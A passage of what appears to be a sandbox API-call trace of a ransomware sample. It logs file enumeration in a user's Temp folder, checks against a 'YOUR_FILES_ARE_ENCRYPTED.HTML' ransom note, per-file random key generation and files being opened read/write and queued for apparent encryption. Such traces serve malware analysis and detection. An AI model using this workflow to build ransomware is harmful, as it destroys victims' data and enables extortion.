param_1="06") returned 2 [0122.074] wsprintfW (in: param_1=0x19e6fa, param_2="%02X" | out: param_1="C7") returned 2 [0122.074] wsprintfW (in: param_1=0x19e6fe, param_2="%02X" | out: param_1="BA") returned 2 [0122.075] wsprintfW (in: param_1=0x19e702, param_2="%02X" | out: param_1="0A") returned 2 [0122.075] wsprintfW (in: param_1=0x19e706, param_2="%02X" | out: param_1="2E") returned 2 [0122.075] wsprintfW (in: param_1=0x19e70a, param_2="%02X" | out: param_1="6A") returned 2 [0122.075] wsprintfW (in: param_1=0x19e70e, param_2="%02X" | out: param_1="16") returned 2 [0122.075] wsprintfW (in: param_1=0x19e712, param_2="%02X" | out: param_1="C9") returned 2 [0122.075] wsprintfW (in: param_1=0x19e716, param_2="%02X" | out: param_1="CB") returned 2 [0122.075] wsprintfW (in: param_1=0x19e71a, param_2="%02X" | out: param_1="AD") returned 2 [0122.075] wsprintfW (in: param_1=0x19e71e, param_2="%02X" | out: param_1="96") returned 2 [0122.075] wsprintfW (in: param_1=0x19e722, param_2="%02X" | out: param_1="1A") returned 2 [0122.075] wsprintfW (in: param_1=0x19e726, param_2="%02X" | out: param_1="0C") returned 2 [0122.075] wsprintfW (in: param_1=0x19e72a, param_2="%02X" | out: param_1="9E") returned 2 [0122.075] wsprintfW (in: param_1=0x19e72e, param_2="%02X" | out: param_1="C4") returned 2 [0122.075] wsprintfW (in: param_1=0x19e732, param_2="%02X" | out: param_1="6B") returned 2 [0122.075] wsprintfW (in: param_1=0x19e736, param_2="%02X" | out: param_1="7A") returned 2 [0122.075] wsprintfW (in: param_1=0x19e73a, param_2="%02X" | out: param_1="C2") returned 2 [0122.075] wsprintfW (in: param_1=0x19e73e, param_2="%02X" | out: param_1="1C") returned 2 [0122.075] wsprintfW (in: param_1=0x19e742, param_2="%02X" | out: param_1="44") returned 2 [0122.075] wsprintfW (in: param_1=0x19e746, param_2="%02X" | out: param_1="17") returned 2 [0122.075] wsprintfW (in: param_1=0x19e74a, param_2="%02X" | out: param_1="E0") returned 2 [0122.075] wsprintfW (in: param_1=0x19e74e, param_2="%02X" | out: param_1="24") returned 2 [0122.075] lstrcpyW (in: lpString1=0x33500bc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\GcjMwU.mp3" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\GcjMwU.mp3") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\GcjMwU.mp3" [0122.076] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x274, CompletionKey=0x3340008, NumberOfConcurrentThreads=0x0) returned 0x274 [0122.076] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x3340008, lpOverlapped=0x3340008) returned 1 [0122.082] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x72840a30, ftCreationTime.dwHighDateTime=0x1d7045b, ftLastAccessTime.dwLowDateTime=0xa0beb510, ftLastAccessTime.dwHighDateTime=0x1d70534, ftLastWriteTime.dwLowDateTime=0xa0beb510, ftLastWriteTime.dwHighDateTime=0x1d70534, nFileSizeHigh=0x0, nFileSizeLow=0x38b1, dwReserved0=0x19e94c, dwReserved1=0x39f712c, cFileName="H8r4Wp5m p94hX.pptx", cAlternateFileName="H8R4WP~1.PPT")) returned 1 [0122.083] StrStrIW (lpFirst="H8r4Wp5m p94hX.pptx", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0122.083] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\H8r4Wp5m p94hX.pptx") returned 64 [0122.083] PathFindExtensionW (pszPath="H8r4Wp5m p94hX.pptx") returned=".pptx" [0122.083] lstrlenW (lpString=".pptx") returned 5 [0122.083] PathFindExtensionW (pszPath="H8r4Wp5m p94hX.pptx") returned=".pptx" [0122.083] SystemFunction036 (in: RandomBuffer=0x19e794, RandomBufferLength=0x20 | out: RandomBuffer=0x19e794) returned 1 [0122.083] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\H8r4Wp5m p94hX.pptx" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\h8r4wp5m p94hx.pptx"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x308 [0122.084] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x19e7b8 | out: lpFileSize=0x19e7b8*=14513) returned 1 [0122.084] GetProcessHeap () returned 0x600000 [0122.084] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x3340008 [0122.086] wsprintfW (in: param_1=0x19e6d2, param_2="%02X" | out: param_1="ED") returned 2 [0122.086] wsprintfW (in: param_1=0x19e6d6, param_2="%02X" | out: param_1="EF") returned 2 [0122.086] wsprintfW (in: param_1=0x19e6da, param_2="%02X" | out: param_1="DD") returned 2 [0122.086] wsprintfW (in: param_1=0x19e6de, param_2="%02X" | out: param_1="8F") returned 2 [0122.086] wsprintfW (in: param_1=0x19e6e2, param_2="%02X" | out: param_1="3F") returned 2 [0122.086] wsprintfW (in: param_1=0x19e6e6, param_2="%02X" | out: param_1="D3") returned 2 [0122.086] wsprintfW (in: param_1=0x19e6ea, param_2="%02X" | out: param_1="F3") returned 2 [0122.087] wsprintfW (in: param_1=0x19e6ee, param_2="%02X" | out: param_1="E3") returned 2 [0122.087] wsprintfW (in: param_1=0x19e6f2, param_2="%02X" | out: param_1="03") returned 2 [0122.087] wsprintfW (in: param_1=0x19e6f6, param_2="%02X" | out: param_1="E6") returned 2 [0122.087] wsprintfW (in: param_1=0x19e6fa, param_2="%02X" | out: param_1="D1") returned 2 [0122.087] wsprintfW (in: param_1=0x19e6fe, param_2="%02X" | out: param_1="69") returned 2 [0122.087] wsprintfW (in: param_1=0x19e702, param_2="%02X" | out: param_1="ED") returned 2 [0122.087] wsprintfW (in: param_1=0x19e706, param_2="%02X" | out: param_1="45") returned 2 [0122.087] wsprintfW (in: param_1=0x19e70a, param_2="%02X" | out: param_1="22") returned 2 [0122.087] wsprintfW (in: param_1=0x19e70e, param_2="%02X" | out: param_1="91") returned 2 [0122.087] wsprintfW (in: param_1=0x19e712, param_2="%02X" | out: param_1="B0") returned 2 [0122.087] wsprintfW (in: param_1=0x19e716, param_2="%02X" | out: param_1="DB") returned 2 [0122.087] wsprintfW (in: param_1=0x19e71a, param_2="%02X" | out: param_1="5B") returned 2 [0122.087] wsprintfW (in: param_1=0x19e71e, param_2="%02X" | out: param_1="C6") returned 2 [0122.087] wsprintfW (in: param_1=0x19e722, param_2="%02X" | out: param_1="76") returned 2 [0122.087] wsprintfW (in: param_1=0x19e726, param_2="%02X" | out: param_1="8A") returned 2 [0122.087] wsprintfW (in: param_1=0x19e72a, param_2="%02X" | out: param_1="C2") returned 2 [0122.087] wsprintfW (in: param_1=0x19e72e, param_2="%02X" | out: param_1="E3") returned 2 [0122.087] wsprintfW (in: param_1=0x19e732, param_2="%02X" | out: param_1="59") returned 2 [0122.087] wsprintfW (in: param_1=0x19e736, param_2="%02X" | out: param_1="9E") returned 2 [0122.087] wsprintfW (in: param_1=0x19e73a, param_2="%02X" | out: param_1="89") returned 2 [0122.087] wsprintfW (in: param_1=0x19e73e, param_2="%02X" | out: param_1="A2") returned 2 [0122.087] wsprintfW (in: param_1=0x19e742, param_2="%02X" | out: param_1="3C") returned 2 [0122.087] wsprintfW (in: param_1=0x19e746, param_2="%02X" | out: param_1="3F") returned 2 [0122.087] wsprintfW (in: param_1=0x19e74a, param_2="%02X" | out: param_1="9D") returned 2 [0122.087] wsprintfW (in: param_1=0x19e74e, param_2="%02X" | out: param_1="12") returned 2 [0122.088] lstrcpyW (in: lpString1=0x33500bc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\H8r4Wp5m p94hX.pptx" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\H8r4Wp5m p94hX.pptx") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\H8r4Wp5m p94hX.pptx" [0122.088] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x274, CompletionKey=0x3340008, NumberOfConcurrentThreads=0x0) returned 0x274 [0122.088] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x3340008, lpOverlapped=0x3340008) returned 1 [0122.091] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeafcab60, ftCreationTime.dwHighDateTime=0x1d700bf, ftLastAccessTime.dwLowDateTime=0x97a22a20, ftLastAccessTime.dwHighDateTime=0x1d705ac, ftLastWriteTime.dwLowDateTime=0x97a22a20, ftLastWriteTime.dwHighDateTime=0x1d705ac, nFileSizeHigh=0x0, nFileSizeLow=0x11c5e, dwReserved0=0x19e94c, dwReserved1=0x39f712c, cFileName="H8xCf.pdf", cAlternateFileName="")) returned 1 [0122.091] StrStrIW (lpFirst="H8xCf.pdf", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0122.091] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\H8xCf.pdf") returned 54 [0122.091] PathFindExtensionW (pszPath="H8xCf.pdf") returned=".pdf" [0122.091] lstrlenW (lpString=".pdf") returned 4 [0122.091] PathFindExtensionW (pszPath="H8xCf.pdf") returned=".pdf" [0122.091] SystemFunction036 (in: RandomBuffer=0x19e794, RandomBufferLength=0x20 | out: RandomBuffer=0x19e794) returned 1 [0122.091] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\H8xCf.pdf" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\h8xcf.pdf"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x308 [0122.092] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x19e7b8 | out: lpFileSize=0x19e7b8*=72798) returned 1 [0122.092] GetProcessHeap () returned 0x600000 [0122.092] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x3340008 [0122.093] wsprintfW (in: param_1=0x19e6d2, param_2="%02X" | out: param_1="8C") returned 2 [0122.093] wsprintfW (in: param_1=0x19e6d6, param_2="%02X" | out: param_1="CE") returned 2 [0122.093] wsprintfW (in: param_1=0x19e6da, param_2="%02X" | out: param_1="04") returned 2 [0122.093] wsprintfW (in: param_1=0x19e6de, param_2="%02X" | out: param_1="CA") returned 2 [0122.093] wsprintfW (in: param_1=0x19e6e2, param_2="%02X" | out: param_1="E5") returned 2 [0122.093] wsprintfW (in: param_1=0x19e6e6, param_2="%02X" | out: param_1="D5") returned 2 [0122.093] wsprintfW (in: param_1=0x19e6ea, param_2="%02X" | out: param_1="DB") returned 2 [0122.093] wsprintfW (in: param_1=0x19e6ee, param_2="%02X" | out: param_1="C7") returned 2 [0122.093] wsprintfW (in: param_1=0x19e6f2, param_2="%02X" | out: param_1="8F") returned 2 [0122.093] wsprintfW (in: param_1=0x19e6f6, param_2="%02X" | out: param_1="1C") returned 2 [0122.093] wsprintfW (in: param_1=0x19e6fa, param_2="%02X" | out: param_1="0D") returned 2 [0122.093] wsprintfW (in: param_1=0x19e6fe, param_2="%02X" | out: param_1="13") returned 2 [0122.093] wsprintfW (in: param_1=0x19e702, param_2="%02X" | out: param_1="D2") returned 2 [0122.093] wsprintfW (in: param_1=0x19e706, param_2="%02X" | out: param_1="7B") returned 2 [0122.093] wsprintfW (in: param_1=0x19e70a, param_2="%02X" | out: param_1="07") returned 2 [0122.093] wsprintfW (in: param_1=0x19e70e, param_2="%02X" | out: param_1="B7") returned 2 [0122.093] wsprintfW (in: param_1=0x19e712, param_2="%02X" | out: param_1="AA") returned 2 [0122.093] wsprintfW (in: param_1=0x19e716, param_2="%02X" | out: param_1="90") returned 2 [0122.093] wsprintfW (in: param_1=0x19e71a, param_2="%02X" | out: param_1="77") returned 2 [0122.093] wsprintfW (in: param_1=0x19e71e, param_2="%02X" | out: param_1="4A") returned 2 [0122.093] wsprintfW (in: param_1=0x19e722, param_2="%02X" | out: param_1="38") returned 2 [0122.093] wsprintfW (in: param_1=0x19e726, param_2="%02X" | out: param_1="56") returned 2 [0122.093] wsprintfW (in: param_1=0x19e72a, param_2="%02X" | out: param_1="2D") returned 2 [0122.094] wsprintfW (in: param_1=0x19e72e, param_2="%02X" | out: param_1="31") returned 2 [0122.094] wsprintfW (in: param_1=0x19e732, param_2="%02X" | out: param_1="2F") returned 2 [0122.094] wsprintfW (in: param_1=0x19e736, param_2="%02X" | out: param_1="C6") returned 2 [0122.094] wsprintfW (in: param_1=0x19e73a, param_2="%02X" | out: param_1="FC") returned 2 [0122.094] wsprintfW (in: param_1=0x19e73e, param_2="%02X" | out: param_1="7E") returned 2 [0122.094] wsprintfW (in: param_1=0x19e742, param_2="%02X" | out: param_1="3F") returned 2 [0122.094] wsprintfW (in: param_1=0x19e746, param_2="%02X" | out: param_1="2F") returned 2 [0122.094] wsprintfW (in: param_1=0x19e74a, param_2="%02X" | out: param_1="4B") returned 2 [0122.094] wsprintfW (in: param_1=0x19e74e, param_2="%02X" | out: param_1="19") returned 2 [0122.094] lstrcpyW (in: lpString1=0x33500bc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\H8xCf.pdf" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\H8xCf.pdf") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\H8xCf.pdf" [0122.094] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x274, CompletionKey=0x3340008, NumberOfConcurrentThreads=0x0) returned 0x274 [0122.094] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x3340008, lpOverlapped=0x3340008) returned 1 [0122.098] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc1d951f0, ftCreationTime.dwHighDateTime=0x1d703c3, ftLastAccessTime.dwLowDateTime=0xac21e0, ftLastAccessTime.dwHighDateTime=0x1d70a19, ftLastWriteTime.dwLowDateTime=0xac21e0, ftLastWriteTime.dwHighDateTime=0x1d70a19, nFileSizeHigh=0x0, nFileSizeLow=0xadfa, dwReserved0=0x19e94c, dwReserved1=0x39f712c, cFileName="hflhrT6XYXvF6Wc3MMYO.flv", cAlternateFileName="HFLHRT~1.FLV")) returned 1 [0122.098] StrStrIW (lpFirst="hflhrT6XYXvF6Wc3MMYO.flv", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0122.098] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\hflhrT6XYXvF6Wc3MMYO.flv") returned 69 [0122.098] PathFindExtensionW (pszPath="hflhrT6XYXvF6Wc3MMYO.flv") returned=".flv" [0122.098] lstrlenW (lpString=".flv") returned 4 [0122.098] PathFindExtensionW (pszPath="hflhrT6XYXvF6Wc3MMYO.flv") returned=".flv" [0122.098] SystemFunction036 (in: RandomBuffer=0x19e794, RandomBufferLength=0x20 | out: RandomBuffer=0x19e794) returned 1 [0122.098] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\hflhrT6XYXvF6Wc3MMYO.flv" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\hflhrt6xyxvf6wc3mmyo.flv"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x308 [0122.099] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x19e7b8 | out: lpFileSize=0x19e7b8*=44538) returned 1 [0122.099] GetProcessHeap () returned 0x600000 [0122.099] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x3340008 [0122.099] wsprintfW (in: param_1=0x19e6d2, param_2="%02X" | out: param_1="25") returned 2 [0122.099] wsprintfW (in: param_1=0x19e6d6, param_2="%02X" | out: param_1="B0") returned 2 [0122.099] wsprintfW (in: param_1=0x19e6da, param_2="%02X" | out: param_1="40") returned 2 [0122.099] wsprintfW (in: param_1=0x19e6de, param_2="%02X" | out: param_1="07") returned 2 [0122.099] wsprintfW (in: param_1=0x19e6e2, param_2="%02X" | out: param_1="19") returned 2 [0122.099] wsprintfW (in: param_1=0x19e6e6, param_2="%02X" | out: param_1="F0") returned 2 [0122.099] wsprintfW (in: param_1=0x19e6ea, param_2="%02X" | out: param_1="E3") returned 2 [0122.099] wsprintfW (in: param_1=0x19e6ee, param_2="%02X" | out: param_1="08") returned 2 [0122.099] wsprintfW (in: param_1=0x19e6f2, param_2="%02X" | out: param_1="7F") returned 2 [0122.099] wsprintfW (in: param_1=0x19e6f6, param_2="%02X" | out: param_1="1F") returned 2 [0122.099] wsprintfW (in: param_1=0x19e6fa, param_2="%02X" | out: param_1="54") returned 2 [0122.099] wsprintfW (in: param_1=0x19e6fe, param_2="%02X" | out: param_1="BC") returned 2 [0122.099] wsprintfW (in: param_1=0x19e702, param_2="%02X" | out: param_1="88") returned 2 [0122.099] wsprintfW (in: param_1=0x19e706, param_2="%02X" | out: param_1="89") returned 2 [0122.100] wsprintfW (in: param_1=0x19e70a, param_2="%02X" | out: param_1="1F") returned 2 [0122.100] wsprintfW (in: param_1=0x19e70e, param_2="%02X" | out: param_1="48") returned 2 [0122.100] wsprintfW (in: param_1=0x19e712, param_2="%02X" | out: param_1="ED") returned 2 [0122.100] wsprintfW (in: param_1=0x19e716, param_2="%02X" | out: param_1="B7") returned 2 [0122.100] wsprintfW (in: param_1=0x19e71a, param_2="%02X" | out: param_1="5F") returned 2 [0122.100] wsprintfW (in: param_1=0x19e71e, param_2="%02X" | out: param_1="62") returned 2 [0122.100] wsprintfW (in: param_1=0x19e722, param_2="%02X" | out: param_1="E6") returned 2 [0122.101] wsprintfW (in: param_1=0x19e726, param_2="%02X" | out: param_1="78") returned 2 [0122.101] wsprintfW (in: param_1=0x19e72a, param_2="%02X" | out: param_1="D7") returned 2 [0122.101] wsprintfW (in: param_1=0x19e72e, param_2="%02X" | out: param_1="AC") returned 2 [0122.101] wsprintfW (in: param_1=0x19e732, param_2="%02X" | out: param_1="A6") returned 2 [0122.101] wsprintfW (in: param_1=0x19e736, param_2="%02X" | out: param_1="F5") returned 2 [0122.101] wsprintfW (in: param_1=0x19e73a, param_2="%02X" | out: param_1="3B") returned 2 [0122.101] wsprintfW (in: param_1=0x19e73e, param_2="%02X" | out: param_1="54") returned 2 [0122.101] wsprintfW (in: param_1=0x19e742, param_2="%02X" | out: param_1="CF") returned 2 [0122.101] wsprintfW (in: param_1=0x19e746, param_2="%02X" | out: param_1="9A") returned 2 [0122.101] wsprintfW (in: param_1=0x19e74a, param_2="%02X" | out: param_1="A2") returned 2 [0122.101] wsprintfW (in: param_1=0x19e74e, param_2="%02X" | out: param_1="0F") returned 2 [0122.102] lstrcpyW (in: lpString1=0x33500bc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\hflhrT6XYXvF6Wc3MMYO.flv" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\hflhrT6XYXvF6Wc3MMYO.flv") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\hflhrT6XYXvF6Wc3MMYO.flv" [0122.102] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x274, CompletionKey=0x3340008, NumberOfConcurrentThreads=0x0) returned 0x274 [0122.102] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x3340008, lpOverlapped=0x3340008) returned 1 [0122.106] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4d272130, ftCreationTime.dwHighDateTime=0x1d70386, ftLastAccessTime.dwLowDateTime=0x562fe0e0, ftLastAccessTime.dwHighDateTime=0x1d7041d, ftLastWriteTime.dwLowDateTime=0x562fe0e0, ftLastWriteTime.dwHighDateTime=0x1d7041d, nFileSizeHigh=0x0, nFileSizeLow=0x14647, dwReserved0=0x19e94c, dwReserved1=0x39f712c, cFileName="HkG6V.mp4", cAlternateFileName="")) returned 1 [0122.106] StrStrIW (lpFirst="HkG6V.mp4", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0122.106] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\HkG6V.mp4") returned 54 [0122.106] PathFindExtensionW (pszPath="HkG6V.mp4") returned=".mp4" [0122.106] lstrlenW (lpString=".mp4") returned 4 [0122.106] PathFindExtensionW (pszPath="HkG6V.mp4") returned=".mp4" [0122.107] SystemFunction036 (in: RandomBuffer=0x19e794, RandomBufferLength=0x20 | out: RandomBuffer=0x19e794) returned 1 [0122.107] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\HkG6V.mp4" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\hkg6v.mp4"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x308 [0122.107] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x19e7b8 | out: lpFileSize=0x19e7b8*=83527) returned 1 [0122.107] GetProcessHeap () returned 0x600000 [0122.107] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x3340008 [0122.110] wsprintfW (in: param_1=0x19e6d2, param_2="%02X" | out: param_1="68") returned 2 [0122.110] wsprintfW (in: param_1=0x19e6d6, param_2="%02X" | out: param_1="EC") returned 2 [0122.110] wsprintfW (in: param_1=0x19e6da, param_2="%02X" | out: param_1="53") returned 2 [0122.110] wsprintfW (in: param_1=0x19e6de, param_2="%02X" | out: param_1="52") returned 2 [0122.110] wsprintfW (in: param_1=0x19e6e2, param_2="%02X" | out: param_1="65") returned 2 [0122.110] wsprintfW (in: param_1=0x19e6e6, param_2="%02X" | out: param_1="A9") returned 2 [0122.110] wsprintfW (in: param_1=0x19e6ea, param_2="%02X" | out: param_1="21") returned 2 [0122.110] wsprintfW (in: param_1=0x19e6ee, param_2="%02X" | out: param_1="76") returned 2 [0122.110] wsprintfW (in: param_1=0x19e6f2, param_2="%02X" | out: param_1="32") returned 2 [0122.110] wsprintfW (in: param_1=0x19e6f6, param_2="%02X" | out: param_1="C7") returned 2 [0122.110] wsprintfW (in: param_1=0x19e6fa, param_2="%02X" | out: param_1="8D") returned 2 [0122.110] wsprintfW (in: param_1=0x19e6fe, param_2="%02X" | out: param_1="32") returned 2 [0122.110] wsprintfW (in: param_1=0x19e702, param_2="%02X" | out: param_1="DE") returned 2 [0122.110] wsprintfW (in: param_1=0x19e706, param_2="%02X" | out: param_1="36") returned 2 [0122.110] wsprintfW (in: param_1=0x19e70a, param_2="%02X" | out: param_1="21") returned 2 [0122.110] wsprintfW (in: param_1=0x19e70e, param_2="%02X" | out: param_1="CC") returned 2 [0122.110] wsprintfW (in: param_1=0x19e712, param_2="%02X" | out: param_1="26") returned 2 [0122.110] wsprintfW (in: param_1=0x19e716, param_2="%02X" | out: param_1="DA") returned 2 [0122.110] wsprintfW (in: param_1=0x19e71a, param_2="%02X" | out: param_1="2F") returned 2 [0122.110] wsprintfW (in: param_1=0x19e71e, param_2="%02X" | out: param_1="3E") returned 2 [0122.110] wsprintfW (in: param_1=0x19e722, param_2="%02X" | out: param_1="0E") returned 2 [0122.110] wsprintfW (in: param_1=0x19e726, param_2="%02X" | out: param_1="9E") returned 2 [0122.110] wsprintfW (in: param_1=0x19e72a, param_2="%02X" | out: param_1="8C") returned 2 [0122.110] wsprintfW (in: param_1=0x19e72e, param_2="%02X" | out: param_1="9C") returned 2 [0122.110] wsprintfW (in: param_1=0x19e732, param_2="%02X" | out: param_1="D5") returned 2 [0122.110] wsprintfW (in: param_1=0x19e736, param_2="%02X" | out: param_1="28") returned 2 [0122.110] wsprintfW (in: param_1=0x19e73a, param_2="%02X" | out: param_1="CE") returned 2 [0122.110] wsprintfW (in: param_1=0x19e73e, param_2="%02X" | out: param_1="BE") returned 2 [0122.110] wsprintfW (in: param_1=0x19e742, param_2="%02X" | out: param_1="7E") returned 2 [0122.110] wsprintfW (in: param_1=0x19e746, param_2="%02X" | out: param_1="1C") returned 2 [0122.110] wsprintfW (in: param_1=0x19e74a, param_2="%02X" | out: param_1="76") returned 2 [0122.110] wsprintfW (in: param_1=0x19e74e, param_2="%02X" | out: param_1="78") returned 2 [0122.111] lstrcpyW (in: lpString1=0x33500bc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\HkG6V.mp4" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\HkG6V.mp4") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\HkG6V.mp4" [0122.111] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x274, CompletionKey=0x3340008, NumberOfConcurrentThreads=0x0) returned 0x274 [0122.111] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x3340008, lpOverlapped=0x3340008) returned 1 [0122.113] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1b6399f0, ftCreationTime.dwHighDateTime=0x1d6ffc9, ftLastAccessTime.dwLowDateTime=0x204cbae0, ftLastAccessTime.dwHighDateTime=0x1d702b3, ftLastWriteTime.dwLowDateTime=0x204cbae0, ftLastWriteTime.dwHighDateTime=0x1d702b3, nFileSizeHigh=0x0, nFileSizeLow=0xd05a, dwReserved0=0x19e94c, dwReserved1=0x39f712c, cFileName="KfJl5xYmaYH.mp4", cAlternateFileName="KFJL5X~1.MP4")) returned 1 [0122.113] StrStrIW (lpFirst="KfJl5xYmaYH.mp4", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0122.113] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\KfJl5xYmaYH.mp4") returned 60 [0122.113] PathFindExtensionW (pszPath="KfJl5xYmaYH.mp4") returned=".mp4" [0122.113] lstrlenW (lpString=".mp4") returned 4 [0122.113] PathFindExtensionW (pszPath="KfJl5xYmaYH.mp4") returned=".mp4" [0122.113] SystemFunction036 (in: RandomBuffer=0x19e794, RandomBufferLength=0x20 | out: RandomBuffer=0x19e794) returned 1 [0122.113] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\KfJl5xYmaYH.mp4" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\kfjl5xymayh.mp4"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x308 [0122.116] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x19e7b8 | out: lpFileSize=0x19e7b8*=53338) returned 1 [0122.116] GetProcessHeap () returned 0x600000 [0122.116] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x3340008 [0122.116] wsprintfW (in: param_1=0x19e6d2, param_2="%02X" | out: param_1="F0") returned 2 [0122.116] wsprintfW (in: param_1=0x19e6d6, param_2="%02X" | out: param_1="BA") returned 2 [0122.116] wsprintfW (in: param_1=0x19e6da, param_2="%02X" | out: param_1="AD") returned 2 [0122.116] wsprintfW (in: param_1=0x19e6de, param_2="%02X" | out: param_1="B7") returned 2 [0122.116] wsprintfW (in: param_1=0x19e6e2, param_2="%02X" | out: param_1="61") returned 2 [0122.116] wsprintfW (in: param_1=0x19e6e6, param_2="%02X" | out: param_1="0E") returned 2 [0122.116] wsprintfW (in: param_1=0x19e6ea, param_2="%02X" | out: param_1="1F") returned 2 